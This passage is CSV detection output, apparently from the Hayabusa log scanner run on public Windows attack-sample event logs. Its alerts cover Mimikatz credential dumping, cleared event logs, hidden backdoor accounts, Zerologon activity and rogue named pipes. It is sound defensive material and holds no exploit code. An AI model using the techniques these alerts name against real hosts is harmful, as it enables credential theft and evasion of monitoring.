747F3D96-93D3-5F53-3802-00000000E500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_EventLog_Service_Crashed.evtx 
2020-09-05 22:37:07.245 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x2 /state0:0xa3bd2855 /state1:0x41c64e6d | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 1008 | PGUID: 747F3D96-130C-5F54-1300-00000000E600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_EventLog_Service_Crashed.evtx 2020-09-09 22:18:23.627 +09:00,MSEDGEWIN10,4625,low,,Logon Failure - Wrong Password,User: IEUser | Type: 2 | Computer: MSEDGEWIN10 | IP Addr: - | AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_4624_4625_LogonType2_LogonProc_chrome.evtx 2020-09-11 02:48:47.077 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: c:\windows\system32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe | LID: 0x3e7 | PID: 388 | PGUID: 747F3D96-66F7-5F5A-0500-00000000F600,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_smss_child_proc_bootexecute_setupexecute.evtx 2020-09-11 02:48:47.077 +09:00,MSEDGEWIN10,1,high,PrivEsc,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/proc_creation_win_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_smss_child_proc_bootexecute_setupexecute.evtx 2020-09-11 21:10:22.398 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\mimilsa.log | Process: C:\Windows\system32\lsass.exe | PID: 640 | PGUID: 747F3D96-672C-5F5B-0D00-00000000FC00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_Mimikatz_Memssp_Default_Logs_Sysmon_11.evtx 2020-09-11 21:10:22.398 +09:00,MSEDGEWIN10,11,critical,CredAccess,Mimikatz MemSSP 
Default Log File Creation,,rules/sigma/file_event/file_event_mimimaktz_memssp_log_file.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_Mimikatz_Memssp_Default_Logs_Sysmon_11.evtx 2020-09-14 23:44:04.878 +09:00,Sec504Student,1102,high,Evas,Security Log Cleared,User: Sec504,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/eventlog-dac.evtx 2020-09-14 23:44:14.393 +09:00,Sec504Student,4674,medium,Persis,Possible Hidden Service Attempt,Svc: nginx | User: Sec504 | LID: 0x99e3d | AccessMask: %%1539,rules/hayabusa/default/alerts/Security/4674_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/DeepBlueCLI/eventlog-dac.evtx 2020-09-14 23:46:33.690 +09:00,Sec504Student,4674,medium,Persis,Possible Hidden Service Attempt,Svc: nginx | User: Sec504 | LID: 0x99e3d | AccessMask: %%1539,rules/hayabusa/default/alerts/Security/4674_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/DeepBlueCLI/eventlog-dac.evtx 2020-09-14 23:48:28.683 +09:00,Sec504Student,4674,medium,Persis,Possible Hidden Service Attempt,Svc: nginx | User: Sec504 | LID: 0x99e3d | AccessMask: %%1539,rules/hayabusa/default/alerts/Security/4674_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/DeepBlueCLI/eventlog-dac.evtx 2020-09-16 03:04:36.333 +09:00,MSEDGEWIN10,1102,high,Evas,Security Log Cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Runas_4624_4648_Webshell_CreateProcessAsUserA.evtx 2020-09-16 03:04:39.987 +09:00,MSEDGEWIN10,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: svc01 | Target User: IEUser | IP Address: - | Process: C:\Windows\System32\inetsrv\w3wp.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/Runas_4624_4648_Webshell_CreateProcessAsUserA.evtx 2020-09-16 04:28:17.594 +09:00,01566s-win16-ir.threebeesco.com,1102,high,Evas,Security Log Cleared,User: a-jbrown,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Zerologon_VoidSec_CVE-2020-1472_4626_LT3_Anonym_follwedby_4742_DC_Anony_DC.evtx 2020-09-16 04:28:31.453 +09:00,01566s-win16-ir.threebeesco.com,104,high,Evas,System Log File Cleared,User: a-jbrown,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Zerologon_CVE-2020-1472_DFIR_System_NetLogon_Error_EventID_5805.evtx 2020-09-16 04:29:51.507 +09:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: ANONYMOUS LOGON | Computer: 02694W-WIN10 | IP Addr: 172.16.66.37 | LID: 0x31ff6e,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Zerologon_VoidSec_CVE-2020-1472_4626_LT3_Anonym_follwedby_4742_DC_Anony_DC.evtx 2020-09-16 04:29:51.517 +09:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: ANONYMOUS LOGON | Computer: 02694W-WIN10 | IP Addr: 172.16.66.37 | LID: 0x31ff89,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Zerologon_VoidSec_CVE-2020-1472_4626_LT3_Anonym_follwedby_4742_DC_Anony_DC.evtx 2020-09-16 18:31:19.133 +09:00,01566s-win16-ir.threebeesco.com,4720,high,Persis,Hidden User Account Created! 
(Possible Backdoor),User: $ | SID: S-1-5-21-308926384-506822093-3341789130-107103,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_ComputerAccountCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_Fake_ComputerAccount_4720.evtx 2020-09-16 18:31:19.133 +09:00,01566s-win16-ir.threebeesco.com,4720,high,Evas,New or Renamed User Account with '$' in Attribute 'SamAccountName'.,,rules/sigma/builtin/security/win_new_or_renamed_user_account_with_dollar_sign.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_Fake_ComputerAccount_4720.evtx 2020-09-16 18:32:13.647 +09:00,01566s-win16-ir.threebeesco.com,4720,high,Persis,Hidden User Account Created! (Possible Backdoor),User: $ | SID: S-1-5-21-308926384-506822093-3341789130-107104,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_ComputerAccountCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_Fake_ComputerAccount_4720.evtx 2020-09-16 18:32:13.647 +09:00,01566s-win16-ir.threebeesco.com,4720,high,Evas,New or Renamed User Account with '$' in Attribute 'SamAccountName'.,,rules/sigma/builtin/security/win_new_or_renamed_user_account_with_dollar_sign.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_Fake_ComputerAccount_4720.evtx 2020-09-17 19:57:37.013 +09:00,01566s-win16-ir.threebeesco.com,1102,high,Evas,Security Log Cleared,User: a-jbrown,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_pwd_reset_rpc_mimikatz_postzerologon_target_DC.evtx 2020-09-17 19:57:44.254 +09:00,01566s-win16-ir.threebeesco.com,4776,info,,NTLM Logon To Local Account,User: Administrator | Computer: 02694W-WIN10 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential 
Access/remote_pwd_reset_rpc_mimikatz_postzerologon_target_DC.evtx 2020-09-17 19:57:44.270 +09:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: Administrator | Computer: 02694W-WIN10 | IP Addr: 172.16.66.37 | LID: 0x853237,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_pwd_reset_rpc_mimikatz_postzerologon_target_DC.evtx 2020-09-20 06:12:15.920 +09:00,01566s-win16-ir.threebeesco.com,12,medium,,Registry Key Create/Delete_Sysmon Alert,Machine Account Saved Password Set | CreateKey: HKLM\SECURITY\Policy\Secrets\$MACHINE.ACC\CurrVal | Process: C:\Windows\system32\lsass.exe | PID: 584 | PGUID: 83989F29-0ADD-5F61-0B00-00000000FE00,rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Sysmon13_MachineAccount_Password_Hash_Changed_via_LsarSetSecret.evtx 2020-09-20 06:12:15.920 +09:00,01566s-win16-ir.threebeesco.com,13,medium,,Registry Key Value Set_Sysmon Alert,Machine Account Saved Password Set | SetValue: HKLM\SECURITY\Policy\Secrets\$MACHINE.ACC\CurrVal\(Default): Binary Data | Process: C:\Windows\system32\lsass.exe | PID: 584 | PGUID: 83989F29-0ADD-5F61-0B00-00000000FE00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Sysmon13_MachineAccount_Password_Hash_Changed_via_LsarSetSecret.evtx 2020-09-20 06:14:32.852 +09:00,01566s-win16-ir.threebeesco.com,12,medium,,Registry Key Create/Delete_Sysmon Alert,Machine Account Saved Password Set | CreateKey: HKLM\SECURITY\Policy\Secrets\$MACHINE.ACC\CurrVal | Process: C:\Windows\system32\lsass.exe | PID: 584 | PGUID: 83989F29-0ADD-5F61-0B00-00000000FE00,rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Sysmon13_MachineAccount_Password_Hash_Changed_via_LsarSetSecret.evtx 
2020-09-20 06:14:32.852 +09:00,01566s-win16-ir.threebeesco.com,13,medium,,Registry Key Value Set_Sysmon Alert,Machine Account Saved Password Set | SetValue: HKLM\SECURITY\Policy\Secrets\$MACHINE.ACC\CurrVal\(Default): Binary Data | Process: C:\Windows\system32\lsass.exe | PID: 584 | PGUID: 83989F29-0ADD-5F61-0B00-00000000FE00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Sysmon13_MachineAccount_Password_Hash_Changed_via_LsarSetSecret.evtx 2020-09-21 06:22:24.799 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Local Admin Password Setting Changed | SetValue: HKLM\SAM\SAM\Domains\Account\Users\000001F4\ForcePasswordReset: Binary Data | Process: C:\Windows\system32\lsass.exe | PID: 648 | PGUID: 747F3D96-C6C1-5F67-0000-0010A65D0000,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Sysmon_13_Local_Admin_Password_Changed.evtx 2020-09-24 01:49:26.469 +09:00,01566s-win16-ir.threebeesco.com,3,info,,Network Connection,tcp | Src: 0:0:0:0:0:0:0:1:52246 (01566s-win16-ir.threebeesco.com) | Dst: 0:0:0:0:0:0:0:1:389 (01566s-win16-ir.threebeesco.com) | User: NT AUTHORITY\SYSTEM | Process: C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe | PID: 1864 | PGUID: 83989F29-3391-5F6B-1F00-000000000301,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx 2020-09-24 01:49:41.578 +09:00,01566s-win16-ir.threebeesco.com,1102,high,Evas,Security Log Cleared,User: Administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx 2020-09-24 01:49:44.353 +09:00,01566s-win16-ir.threebeesco.com,1,info,,Process Created,Cmd: 
C:\Windows\system32\DllHost.exe /Processid:{DC4537C3-CA73-4AC7-9E1D-B2CE27C3A7A6} | Process: C:\Windows\System32\dllhost.exe | User: 3B\Administrator | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x7b186 | PID: 3276 | PGUID: 83989F29-7CA8-5F6B-1201-000000000301,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx 2020-09-24 01:49:44.380 +09:00,01566s-win16-ir.threebeesco.com,1,info,,Process Created,Cmd: C:\Windows\system32\DllHost.exe /Processid:{49F6E667-6658-4BD1-9DE9-6AF87F9FAF85} | Process: C:\Windows\System32\dllhost.exe | User: 3B\Administrator | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x7b186 | PID: 7096 | PGUID: 83989F29-7CA8-5F6B-1301-000000000301,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx 2020-09-24 01:50:16.697 +09:00,01566s-win16-ir.threebeesco.com,4776,info,,NTLM Logon To Local Account,User: Administrator | Computer: | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx 2020-09-24 01:50:16.697 +09:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: Administrator | Computer: - | IP Addr: 172.16.66.37 | LID: 0x1136e95,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx 2020-09-24 01:50:16.702 +09:00,01566s-win16-ir.threebeesco.com,5145,high,LatMov,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx 2020-09-24 01:50:16.703 
+09:00,01566s-win16-ir.threebeesco.com,18,medium,,Pipe Connected_Sysmon Alert,PrivEsc - Rogue Spool named pipe | Pipe: \eventlog | Process: System | PID: 4 | PGUID: 83989F29-3374-5F6B-0100-000000000301,rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx 2020-09-24 01:50:16.892 +09:00,01566s-win16-ir.threebeesco.com,1,info,,Process Created,Cmd: C:\Windows\system32\WerFault.exe -u -p 5424 -s 4616 | Process: C:\Windows\System32\WerFault.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted | LID: 0x3e5 | PID: 6868 | PGUID: 83989F29-7CC8-5F6B-2101-000000000301,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx 2020-09-24 01:50:17.194 +09:00,01566s-win16-ir.threebeesco.com,4776,info,,NTLM Logon To Local Account,User: Administrator | Computer: | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx 2020-09-24 01:50:17.194 +09:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: Administrator | Computer: - | IP Addr: 172.16.66.37 | LID: 0x1137987,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx 2020-09-24 01:50:17.200 +09:00,01566s-win16-ir.threebeesco.com,5145,high,LatMov,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx 2020-09-24 01:50:18.302 +09:00,01566s-win16-ir.threebeesco.com,3,info,,Network Connection,tcp | 
Src: 172.16.66.37:50106 (-) | Dst: 172.16.66.36:445 (01566s-win16-ir.threebeesco.com) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 83989F29-3374-5F6B-0100-000000000301,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx 2020-09-24 01:50:18.302 +09:00,01566s-win16-ir.threebeesco.com,3,info,,Network Connection,tcp | Src: 172.16.66.37:50107 (-) | Dst: 172.16.66.36:445 (01566s-win16-ir.threebeesco.com) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 83989F29-3374-5F6B-0100-000000000301,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx 2020-09-24 01:50:19.821 +09:00,01566s-win16-ir.threebeesco.com,1,info,,Process Created,Cmd: C:\Windows\system32\wermgr.exe -upload | Process: C:\Windows\System32\wermgr.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs | LID: 0x3e7 | PID: 4248 | PGUID: 83989F29-7CCB-5F6B-2301-000000000301,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx 2020-09-24 01:50:27.599 +09:00,01566s-win16-ir.threebeesco.com,3,info,,Network Connection,tcp | Src: 0:0:0:0:0:0:0:1:52249 (01566s-win16-ir.threebeesco.com) | Dst: 0:0:0:0:0:0:0:1:389 (01566s-win16-ir.threebeesco.com) | User: NT AUTHORITY\SYSTEM | Process: C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe | PID: 1864 | PGUID: 83989F29-3391-5F6B-1F00-000000000301,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx 2020-09-24 01:50:45.506 +09:00,01566s-win16-ir.threebeesco.com,17,medium,,Pipe Created_Sysmon Alert,PrivEsc - Rogue Spool named pipe | 
Pipe: \eventlog | Process: C:\Windows\System32\svchost.exe | PID: 6924 | PGUID: 83989F29-7CC9-5F6B-2201-000000000301,rules/hayabusa/sysmon/alerts/17_PipeCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx 2020-09-24 01:51:27.552 +09:00,01566s-win16-ir.threebeesco.com,3,info,,Network Connection,tcp | Src: 0:0:0:0:0:0:0:1:52264 (01566s-win16-ir.threebeesco.com) | Dst: 0:0:0:0:0:0:0:1:389 (01566s-win16-ir.threebeesco.com) | User: NT AUTHORITY\SYSTEM | Process: C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe | PID: 1864 | PGUID: 83989F29-3391-5F6B-1F00-000000000301,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx 2020-09-27 22:19:54.244 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\lsass | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx 2020-09-27 22:19:54.250 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\lsass | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx 2020-09-27 22:19:54.257 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\lsass | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx 2020-09-27 22:19:54.264 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\browser | Process: System | PID: 4 | PGUID: 
747F3D96-0C7A-5F71-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx 2020-09-27 22:19:54.272 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\atsvc | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx 2020-09-27 22:19:54.286 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\epmapper | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx 2020-09-27 22:19:54.293 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\eventlog | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx 2020-09-27 22:19:54.299 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\InitShutdown | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx 2020-09-27 22:19:54.314 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\lsass | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx 2020-09-27 22:19:54.322 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\LSM_API_service | Process: System | PID: 4 | PGUID: 
747F3D96-0C7A-5F71-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx 2020-09-27 22:19:54.328 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\ntsvcs | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx 2020-09-27 22:19:54.343 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\lsass | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx 2020-09-27 22:19:54.350 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\ROUTER | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx 2020-09-27 22:19:54.364 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\scerpc | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx 2020-09-27 22:19:54.371 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\srvsvc | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx 2020-09-27 22:19:54.377 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\tapsrv | Process: System | PID: 4 | PGUID: 
747F3D96-0C7A-5F71-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx 2020-09-27 22:19:54.385 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\trkwks | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx 2020-09-27 22:19:54.399 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\wkssvc | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx 2020-09-27 22:20:11.245 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\wkssvc | Process: C:\Windows\system32\mmc.exe | PID: 6096 | PGUID: 747F3D96-8E29-5F70-0000-001049471000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx 2020-09-27 22:20:11.247 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\browser | Process: C:\Windows\system32\mmc.exe | PID: 6096 | PGUID: 747F3D96-8E29-5F70-0000-001049471000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx 2020-09-27 22:42:00.726 +09:00,MSEDGEWIN10,17,info,,Pipe Created,\svchost | Process: C:\Windows\svchost.exe | PID: 1120 | PGUID: 747F3D96-96A8-5F70-0000-0010C0F02D00,rules/hayabusa/sysmon/events/17_PipeCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_renamed_psexec_service_sysmon_17_18.evtx 2020-09-27 